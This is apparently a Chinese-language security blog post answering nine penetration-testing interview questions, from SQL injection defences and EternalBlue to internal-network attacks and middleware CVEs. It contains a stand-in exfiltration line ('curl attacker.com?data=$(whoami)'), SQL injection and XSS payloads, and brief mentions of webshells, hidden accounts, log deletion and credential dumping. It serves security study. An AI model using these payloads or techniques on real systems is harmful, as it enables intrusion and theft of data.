安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。
1、SQL注入的防護方法有哪些? 2、永恒之藍的漏洞原理是什么?怎么做到的? 3、命令注入有哪些? 4、給你一個目標網站,你該如何進行測試? 5、給你一個后臺登陸地點的網站,你能從中發現那些問題? 6、給你一千臺服務器和交換機,你會如何進行掃描? 7、內網滲透了解多少? 8、中間件有哪些? 9、中間件有哪些已知的漏洞?
1. SQL注入防護方法
核心原則:數據與代碼分離
- 參數化查詢(Prepared Statements)
使用占位符(如?
或@param
)替代拼接SQL,數據庫區分指令與數據(如Java的PreparedStatement
、Python的cursor.execute()
)。- 輸入過濾與白名單校驗
對用戶輸入進行類型/長度約束(如僅允許郵箱格式),禁用高危字符('
、;
、--
)。- 最小權限原則
數據庫賬戶僅賦予必要權限(禁用DROP
、FILE
等)。- ORM框架使用
Hibernate、Entity Framework等自動轉義輸入。- Web應用防火墻(WAF)
部署ModSecurity等規則引擎攔截注入特征(如UNION SELECT
)。- 錯誤信息屏蔽
避免數據庫報錯信息直接返回前端。
2. 永恒之藍(EternalBlue)漏洞原理
CVE編號:CVE-2017-0144
漏洞根源:SMBv1協議處理SMBv1 Trans2
請求的緩沖區溢出漏洞。
攻擊流程:
- 畸形數據包觸發溢出
攻擊者發送特制的SMB_COM_TRANSACTION2
請求,覆蓋內核內存。- 內核權限執行Shellcode
利用溢出覆蓋函數指針,執行攻擊者代碼(如NSA開發的DoublePulsar后門)。- 橫向傳播
通過SMB協議在內網自動擴散(如WannaCry勒索病毒)。
修復方案:
禁用SMBv1,安裝MS17-010補丁,關閉445端口。
3. 命令注入類型與案例
分類方式:
- 直接命令注入
用戶輸入直接拼接至系統命令(如os.system("ping " + user_input)
),可通過;
、&
、|
執行多條命令。- 間接注入(如環境變量污染)
篡改PATH
或LD_PRELOAD
劫持動態鏈接庫。- 盲注(無回顯)
通過時間延遲(sleep 5
)或DNS外帶數據(curl attacker.com?data=$(whoami)
)判斷結果。
高危函數:
PHP的system()
/exec()
、Python的os.popen()
、Node.js 的child_process.exec()
。
4. 目標網站滲透測試流程
分階段方法論:
階段 關鍵操作 信息收集 WHOIS查詢、子域名爆破(Amass)、端口掃描(Nmap)、框架指紋識別(Wappalyzer) 漏洞掃描 自動化工具(Burp Suite、Nessus) + 手動驗證(如修改參數、邊界值測試) 漏洞利用 SQL注入工具(sqlmap)、XSS載荷測試、文件上傳繞過(Content-Type欺騙) 權限提升 利用系統/服務漏洞提權(如Dirty Pipe)、數據庫弱口令爆破 權限維持 植入Webshell(蟻劍/冰蝎)、創建隱藏賬戶、SSH密鑰后門 內網橫向移動 ARP欺騙、Pass-the-Hash攻擊、域滲透(BloodHound分析) 痕跡清理 刪除日志( /var/log/
)、隱藏進程(rootkit)
5. 后臺登錄點安全審計要點
- 認證機制缺陷
- 弱口令(admin/admin123)
- 無驗證碼或驗證碼可繞過(OCR識別、重復使用)
- 未限制登錄嘗試頻率(爆破漏洞)
- 傳輸與存儲風險
- HTTP明文傳輸密碼(應強制HTTPS)
- Cookie未設置
HttpOnly
(XSS竊取會話)- 邏輯漏洞
- 響應差異暴露用戶存在性(枚舉用戶名)
- 密碼重置功能缺陷(Token未綁定用戶、可預測Token)
- 注入漏洞
- SQL注入(
' OR 1=1 --
)- XSS注入(登錄表單插入
<script>alert(1)</script>
)
6. 千臺服務器/交換機掃描策略
分布式架構設計:
mermai
graph LR A[控制節點] --> B[任務隊列 Kafka/RabbitMQ] B --> C[掃描節點1-N] C --> D[結果存儲 ES]
關鍵技術點:
- IP分段與負載均衡
使用nmap -sS -iL targets.txt -oA scan --max-rate 1000
分批次掃描,避免流量洪峰。- 指紋識別優化
并行化服務識別(-sV
)與OS探測(-O
)。- 交換機特殊處理
SNMP掃描(snmpwalk
)、ARP掃描(netdiscover
),避開ICMP限制。- 結果聚合
通過Elasticsearch + Kibana可視化漏洞分布。
7. 內網滲透核心技術
攻擊鏈關鍵步驟:
- 信息收集
ARP掃描、NetBIOS枚舉、域控制器定位(nltest /dclist
)。- 權限提升
本地提權(CVE-2021-4034)、憑證竊取(Mimikatz抓取LSASS內存)。- 橫向移動
- 協議利用:SMB爆破(CrackMapExec)、WinRM遠程執行
- 中間人攻擊:LLMNR/NBT-NS投毒(Responder)
- 域滲透:黃金票據偽造、DCSync攻擊獲取域控權限
- 數據竊取與持久化
隱蔽隧道(DNS/ICMP)、GPO組策略后門。
8. 常見中間件列表
類型 代表產品 Web服務器 Apache、Nginx、IIS 應用服務器 Tomcat、WebLogic、JBoss/WildFly 反向代理 Traefik、HAProxy 消息隊列 RabbitMQ、Kafka、ActiveMQ API網關 Kong、Tyk
9. 中間件經典漏洞案例
中間件 漏洞 影響 Apache CVE-2021-41773(路徑遍歷) 讀取服務器敏感文件 Nginx CVE-2013-2028(棧溢出) 遠程代碼執行(RCE) Tomcat CVE-2020-1938(Ghostcat) AJP協議文件讀取/RCE WebLogic CVE-2020-14882(未授權命令執行) 控制服務器 JBoss JMXInvokerServlet 反序列化 遠程代碼執行